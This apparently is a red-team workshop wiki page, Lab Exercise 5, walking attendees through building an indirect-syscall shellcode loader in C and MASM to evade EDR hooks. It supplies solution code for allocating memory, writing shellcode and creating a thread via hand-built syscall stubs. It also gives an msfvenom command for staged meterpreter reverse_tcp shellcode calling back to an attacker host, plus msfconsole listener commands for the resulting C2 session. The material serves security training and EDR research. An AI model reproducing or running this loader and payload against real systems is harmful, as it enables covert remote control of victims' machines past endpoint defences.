
14: Chapter 7 | LAB Exercise Playbook

VirtualAllocEx edited this page Jan 11, 2024 · 42 revisions

LAB Exercise 5: Indirect Syscall Loader

Building on the Win32 API loader, this exercise makes the third modification and creates the indirect syscall loader.

The main difference between the direct and the indirect syscall loader is that only part of a native function's syscall stub is implemented in the indirect syscall loader itself. We implement and execute mov r10, rcx, mov eax, SSN and jmp qword ptr in the loader, but unlike the direct syscall loader, we do not execute the syscall and return instructions from the loader's own memory. Instead, the unconditional jump jmp qword ptr transfers execution to the address of the syscall instruction inside the native function in ntdll.dll, so that the syscall and return instructions are executed from the memory of ntdll.dll. Why this is an advantage over direct syscalls in terms of EDR evasion is discussed in detail in Chapter 8, where we compare the call stacks of our various shellcode loaders.

Prinicipal_indirect_syscalls

The code template for this tutorial can be found here.

Exercise Tasks:

Build Indirect Syscall Loader

Task Nr. Task Description
1 Download the indirect syscall loader POC for this chapter.
2 Most of the code is already implemented in the POC. However, you have to complete the indirect syscall loader by performing the following tasks:
  • Complete the code section to dynamically retrieve the start address of each native function using the GetProcAddress API.
  • Complete the section of code that calculates the effective memory addresses for the syscall addresses.
  • Declare the three missing global variables to hold the calculated syscall instruction addresses.
  • Create a new header file syscalls.h using the code supplied for it later in this playbook, and include syscalls.h in the main code.
  • Import the syscalls.asm file as a resource and complete the assembly code by adding the missing assembler code for the remaining three native APIs following the scheme of the already implemented code for NtAllocateVirtualMemory.
  • Enable Microsoft Macro Assembler (MASM) in the indirect syscall POC in Visual Studio.
3 Create a staged x64 meterpreter shellcode with msfvenom, copy it to the POC and compile the POC.
4 Create and run a staged x64 meterpreter listener using msfconsole.
5 Run your compiled .exe and check that a stable command and control channel opens.

Analyse Indirect Syscall Loader

Task Nr. Task Description
6 Use the Visual Studio dumpbin tool to analyse the syscall loader. Are any Win32 APIs being imported from kernel32.dll? Is the result what you expected?
7 Use x64dbg to debug or analyse the loader.
  • Check which Win32 APIs and native APIs are being imported. If they are being imported, from which module or memory location are they being imported? Is the result what you expected?
  • Check from which module or memory location the syscalls for the four APIs used are being executed. Is the result what you expected?
  • etc.

Visual Studio

You can download the POC from the code section of this chapter. The code works as follows. The shellcode declaration is done as before.

// Insert the Meterpreter shellcode as an array of unsigned chars (replace the placeholder with actual shellcode)
    unsigned char code[] = "\xfc\x48\x83";

Syscall and Return

As mentioned at the beginning of this chapter, we want the syscall and return instructions of the native functions we use to be executed from the syscall stub in the memory of ntdll.dll. Therefore, at the right moment, we need to jump from the memory of the indirect syscall loader to the address of the syscall instruction of the corresponding native function in the memory of ntdll.dll. This is done by executing jmp qword ptr in the indirect syscall loader after mov r10, rcx and mov eax, SSN have been executed. To do this using Windows APIs, we need to do the following:

  • Retrieve a handle to the already loaded ntdll.dll at runtime using GetModuleHandleA.

  • Get the start address of the native function in ntdll.dll using GetProcAddress and store it in a local variable (a UINT_PTR in the POC).

  • Get the memory address of the syscall instruction in the syscall stub by adding the required offset to the start address, and store it in a global variable.

Handle to ntdll.dll

First, we use the following code, which calls GetModuleHandleA to retrieve a handle to ntdll.dll at runtime. This code is already implemented in the indirect syscall POC.

Code
// Get a handle to the ntdll.dll library
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (hNtdll == NULL) {
        // Handle the error, for example, print an error message and return.
        printf("Error: the specified module could not be found.");
        return 1; // Or any other non-zero value, since typically a zero return indicates success
    }     

Start Address Native Function

Next, we use the following code, which calls GetProcAddress to get the start address of the respective native function in the memory of ntdll.dll and stores it in a UINT_PTR variable.

Task

In the indirect syscall POC, this code is implemented only for the native function NtAllocateVirtualMemory and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory which can be seen in the code section below.

Code
// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
    UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");     

If it was not possible for you to complete this code section, you can find the code in the following solution section.

Solution
// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
    UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    UINT_PTR pNtWriteVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    UINT_PTR pNtCreateThreadEx = (UINT_PTR)GetProcAddress(hNtdll, "NtCreateThreadEx");
    UINT_PTR pNtWaitForSingleObject = (UINT_PTR)GetProcAddress(hNtdll, "NtWaitForSingleObject");     

Memory Address Syscall Instruction

In the next step, we want to get the effective memory address of the syscall instruction in the syscall stub of the native function by adding the necessary offset to the start address of the native function that we retrieved in the previous step. To get the memory address of the syscall instruction, we need to add 0x12 bytes (18 in decimal). Why exactly 0x12 bytes? This is the distance from the start address of the native function to the syscall instruction within the syscall stub.

02

Task

In the indirect syscall POC, this code is implemented only for the native function NtAllocateVirtualMemory and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory which can be seen in the code section below.

Code
// The syscall instruction is located some bytes into the function's syscall stub.
    // In this case, it's assumed to be 0x12 (18 in decimal) bytes from the start of the function.
    // So we add 0x12 to the function's address to get the address of the syscall instruction.
    sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;     

If it was not possible for you to complete this code section, you can find the code in the following solution section.

Solution
// The syscall instruction is located some bytes into the function's syscall stub.
    // In this case, it's assumed to be 0x12 (18 in decimal) bytes from the start of the function.
    // So we add 0x12 to the function's address to get the address of the syscall instruction.
    sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;
    sysAddrNtWriteVirtualMemory = pNtWriteVirtualMemory + 0x12;
    sysAddrNtCreateThreadEx = pNtCreateThreadEx + 0x12;
    sysAddrNtWaitForSingleObject = pNtWaitForSingleObject + 0x12;     

Global Variables

To store the memory address of the syscall instruction of the respective native function, and to make that address available later to the assembly code in the syscalls.asm file, we declare one global variable per syscall address. Each variable is declared as a UINT_PTR, an unsigned integer type large enough to hold a pointer.

Task

Here too, the code in the indirect syscall POC is implemented only for the native function NtAllocateVirtualMemory and must be completed by the workshop attendee based on the code scheme for NtAllocateVirtualMemory, which can be seen in the code section below.

Code
// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;     

If it was not possible for you to complete this code section, you can find the code in the following solution section.

Solution
// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;
UINT_PTR sysAddrNtWriteVirtualMemory;
UINT_PTR sysAddrNtCreateThreadEx;
UINT_PTR sysAddrNtWaitForSingleObject;     

Header File

Like the direct syscall loader, we no longer ask ntdll.dll for the function definition of the native APIs we use. But we still want to use the native functions, so we need to define or directly implement the structure for all four native functions in a header file. In this case, the header file should be called syscalls.h.

Task

The syscalls.h file does not currently exist in the syscall POC folder. Your task is to add a new header file named syscalls.h and implement the required code. The code for the syscalls.h file can be found in the code section below. You will also need to include the header syscalls.h in the main code.

If you want to check a function definition manually, additional information should be available in the Microsoft documentation, e.g. for NtAllocateVirtualMemory.

Details

image

Code
#ifndef _SYSCALLS_H  // If _SYSCALLS_H is not defined then define it and the contents below. This is to prevent double inclusion.
#define _SYSCALLS_H  // Define _SYSCALLS_H

#include <windows.h>  // Include the Windows API header

// The type NTSTATUS is typically defined in the Windows headers as a long.
typedef long NTSTATUS;  // Define NTSTATUS as a long
typedef NTSTATUS* PNTSTATUS;  // Define a pointer to NTSTATUS

// Declare the function prototype for NtAllocateVirtualMemory
extern NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,    // Handle to the process in which to allocate the memory
    PVOID* BaseAddress,      // Pointer to the base address
    ULONG_PTR ZeroBits,      // Number of high-order address bits that must be zero in the base address of the section view
    PSIZE_T RegionSize,      // Pointer to the size of the region
    ULONG AllocationType,    // Type of allocation
    ULONG Protect            // Memory protection for the region of pages
);

// Declare the function prototype for NtWriteVirtualMemory
extern NTSTATUS NtWriteVirtualMemory(
    HANDLE ProcessHandle,     // Handle to the process in which to write the memory
    PVOID BaseAddress,        // Pointer to the base address
    PVOID Buffer,             // Buffer containing data to be written
    SIZE_T NumberOfBytesToWrite, // Number of bytes to be written
    PULONG NumberOfBytesWritten // Pointer to the variable that receives the number of bytes written
);

// Declare the function prototype for NtCreateThreadEx
extern NTSTATUS NtCreateThreadEx(
    PHANDLE ThreadHandle,        // Pointer to a variable that receives a handle to the new thread
    ACCESS_MASK DesiredAccess,   // Desired access to the thread
    PVOID ObjectAttributes,      // Pointer to an OBJECT_ATTRIBUTES structure that specifies the object's attributes
    HANDLE ProcessHandle,        // Handle to the process in which the thread is to be created
    PVOID lpStartAddress,        // Pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread
    PVOID lpParameter,           // Pointer to a variable to be passed to the thread
    ULONG Flags,                 // Flags that control the creation of the thread
    SIZE_T StackZeroBits,        // Number of high-order address bits that must be zero in the stack pointer
    SIZE_T SizeOfStackCommit,    // The size of the stack that must be committed at thread creation
    SIZE_T SizeOfStackReserve,   // The size of the stack that must be reserved at thread creation
    PVOID lpBytesBuffer          // Pointer to a variable that receives any output data from the system
);

// Declare the function prototype for NtWaitForSingleObject
extern NTSTATUS NtWaitForSingleObject(
    HANDLE Handle,          // Handle to the object to be waited on
    BOOLEAN Alertable,      // If set to TRUE, the function returns when the system queues an I/O completion routine or APC for the thread
    PLARGE_INTEGER Timeout  // Pointer to a LARGE_INTEGER that specifies the absolute or relative time at which the function should return, regardless of the state of the object
);

#endif // _SYSCALLS_H  // End of the _SYSCALLS_H definition

  

Assembly Instructions

As in the direct syscall loader, we do not want to ask ntdll.dll for the syscall stub or its contents (the assembly instructions mov r10, rcx, mov eax, SSN etc.) of the native functions we use. Instead, we implement the necessary assembly code in the loader itself. Compared to the direct syscall loader, however, the indirect syscall loader implements only part of the syscall stub directly. That is, we implement mov r10, rcx and mov eax, SSN, but we replace the syscall instruction with an unconditional jump instruction jmp qword ptr. This lets us jump to the memory address of the syscall instruction in the memory of ntdll.dll, so that the syscall and return instructions are executed in the memory of ntdll.dll.

Here too, instead of using a tool to create the necessary assembly instructions, we will implement the assembly code manually in our indirect syscall POC for the best learning experience. To do this, you will find a file called syscalls.asm in the indirect syscall loader POC directory, which contains some of the required assembler code. Compared to the direct syscall loader POC, the syscalls.asm file of the indirect syscall loader POC must be able to reference the memory address of the respective syscall instruction. This is necessary to perform the jump into the memory of ntdll.dll. The following code does this for NtAllocateVirtualMemory.

The code below shows the assembler code for the syscall stub of NtAllocateVirtualMemory which is already implemented in the syscalls.asm file.

Code
EXTERN sysAddrNtAllocateVirtualMemory:QWORD   ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
     
.CODE  ; Start the code section

; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx  ; Copy rcx to r10. The syscall instruction overwrites rcx with the return address, so the kernel expects the first argument in r10.
    mov eax, 18h  ; Move the syscall number into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP  ; End of the procedure.     
     
END  ; End of the module     
     

Task

It is your task to add the syscalls.asm file as a resource (existing item) to the indirect syscall loader project and complete the assembler code and C code for the other three missing native APIs NtWriteVirtualMemory, NtCreateThreadEx and NtWaitForSingleObject.

If you are unable to complete the assembly code at this time, you can use the assembly code from the solution and paste it into the syscalls.asm file in the indirect syscall loader POC. Note that the syscall IDs (SSNs) are for Windows 10 Enterprise 22H2 and may not work for your target. You may need to replace them with the correct syscall IDs for your target Windows version.

Solution
EXTERN sysAddrNtAllocateVirtualMemory:QWORD         ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtWriteVirtualMemory:QWORD            ; The actual address of the NtWriteVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtCreateThreadEx:QWORD                ; The actual address of the NtCreateThreadEx syscall in ntdll.dll.
EXTERN sysAddrNtWaitForSingleObject:QWORD           ; The actual address of the NtWaitForSingleObject syscall in ntdll.dll.


.CODE  ; Start the code section

; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx                                    ; Copy rcx to r10. The syscall instruction overwrites rcx with the return address, so the kernel expects the first argument in r10.
    mov eax, 18h                                    ; Move the syscall number into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP                     	; End of the procedure.


; Similar procedure for the NtWriteVirtualMemory syscall
NtWriteVirtualMemory PROC
    mov r10, rcx
    mov eax, 3Ah
    jmp QWORD PTR [sysAddrNtWriteVirtualMemory]
NtWriteVirtualMemory ENDP


; Similar procedure for the NtCreateThreadEx syscall
NtCreateThreadEx PROC
    mov r10, rcx
    mov eax, 0C2h
    jmp QWORD PTR [sysAddrNtCreateThreadEx]
NtCreateThreadEx ENDP


; Similar procedure for the NtWaitForSingleObject syscall
NtWaitForSingleObject PROC
    mov r10, rcx
    mov eax, 4
    jmp QWORD PTR [sysAddrNtWaitForSingleObject]
NtWaitForSingleObject ENDP

END  ; End of the module

Microsoft Macro Assembler (MASM)

We have already implemented all the necessary assembler code in the syscalls.asm file. But for the code to be assembled correctly within the indirect syscall POC, a few more steps are needed. These steps are not done in the downloadable POC and must be done manually.

Task

First, we need to enable support for Microsoft Macro Assembler (MASM) in the Visual Studio project by enabling the option in Build Dependencies/Build Customisations.

Details

06 07

Task

We also need to set the item type of the syscalls.asm file to Microsoft Macro Assembler, otherwise we will get an unresolved symbol error for the native APIs used in the indirect syscall loader. We also set "Excluded from Build" to no and "Content" to yes.

Details

08 09 10

Meterpreter Shellcode

Task

Again, we will create our meterpreter shellcode with msfvenom in Kali Linux. To do this, we will use the following command and create x64 staged meterpreter shellcode.

kali>

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt

11

The shellcode can then be copied into the indirect syscall loader POC by replacing the placeholder in the unsigned char array, and the POC can be compiled as an x64 release.

12

MSF-Listener

Task

Before we test the functionality of our indirect syscall loader, we need to create a listener within msfconsole.

kali>

msfconsole

msf>

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost IPv4_Redirector_or_IPv4_Kali
set lport 80 
set exitonsession false
run

13

Once the listener has been successfully started, you can run your compiled indirect syscall loader. If all goes well, you should see an incoming command and control session.

14

Loader Analysis: Dumpbin

Task

The Visual Studio tool dumpbin can be used to check which Windows APIs are imported via kernel32.dll. The following command can be used to check the imports. Which results do you expect?

cmd>

cd C:\Program Files (x86)\Microsoft Visual Studio\2019\Community
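dumpbin /imports Path/to/Direct_Syscall_Dropper.exe

Results

The Win32 APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are not imported from kernel32.dll. This was expected and is correct. Since the loader calls GetModuleHandleA and GetProcAddress directly, expect these two functions to still appear among the kernel32.dll imports.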

image

Loader Analysis: x64dbg

Task

The first step is to run your indirect syscall loader and check that the .exe is running and that a stable meterpreter C2 channel is open. Then we open x64dbg and attach to the running process. Note that if you open the indirect syscall loader directly in x64dbg, you need to run the executable first.

image

image

Task

Then we want to check which APIs (Win32 or native) are being imported and from which module or memory location. Remember that in the indirect syscall loader we no longer use the Win32 APIs for memory allocation, writing, thread creation and waiting, and have implemented the structure for the native functions directly in the loader. What results do you expect?

Results

Checking the imported symbols in our indirect syscall loader, we should again see that the Win32 APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject are no longer imported from kernel32.dll, or from any other module. So the result is the same as with dumpbin and appears to be valid.

18

Also, looking at the imported symbols (Symbols tab), we see that instead of asking ntdll.dll for the code of the four required native functions NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx and NtWaitForSingleObject, these native functions are implemented directly in the .text region of the shellcode loader.

19

We use the "Follow in Disassembler" function to analyse the indirect syscall loader to identify the lines of code where the calls to the native functions are made.

20 21

We also want to identify the disassembled lines of code where GetModuleHandleA is used to retrieve a handle to ntdll.dll and GetProcAddress is used to get the start address of the native function. We also want to identify the disassembled code where the address of the respective syscall instruction is calculated by adding 0x12 bytes (18 in decimal) as an offset to the start address.

Results

We can identify the lines of code used to retrieve a handle to ntdll.dll using GetModuleHandleA, then get the start address of the native functions using GetProcAddress, and finally calculate the address of the syscall instruction by adding 0x12 bytes (18 in decimal) as an offset to the start address of the respective native function.

22

Task

Also in the case of the indirect syscall loader we want to check in which module the syscall stub or the assembler instructions of the native functions are implemented and executed. Remember, unlike the direct syscall loader from the previous chapter, in the indirect syscall loader POC we have only implemented part of the syscall stub directly into the loader itself. What results do you expect?

Results

For example, for the native function NtAllocateVirtualMemory, we use the "Follow in Disassembler" function and should be able to see that the syscall stub is not fetched from ntdll.dll. Instead, in the indirect syscall loader, only part of the assembly instructions are implemented directly in the .text section of the loader. Furthermore, we can see that the unconditional jump into the memory of ntdll.dll is done via jmp qword ptr and that the syscall and return instructions are executed from the memory location of ntdll.dll.

23 24 25 26

Summary:

  • Made the transition from direct syscalls to indirect syscalls.
  • The loader no longer imports the Win32 APIs VirtualAlloc, WriteProcessMemory, CreateThread and WaitForSingleObject from kernel32.dll.
  • The loader no longer imports native APIs from ntdll.dll.
  • Only part of the syscall stub is implemented directly in the .text section of the shellcode loader.
  • The syscall and return instructions are executed from the memory of ntdll.dll.
  • User-mode hooks placed by an EDR in ntdll.dll can be bypassed.
  • EDR detection based on checking the syscall and return address in the call stack can be bypassed.

Limitations

  • System Service Numbers (SSNs) are hard-coded into the POC.
  • If one or more of the Native APIs used are hooked by the EDR, depending on the EDR, the execution of the shellcode is likely to fail.
  • If an EDR uses Event Tracing for Windows (ETW) or Event Tracing for Windows Threat Intelligence (EtwTi) to check the entire call stack, rather than just the memory area from which the syscall was executed and/or the return address, then indirect syscalls are likely to fail.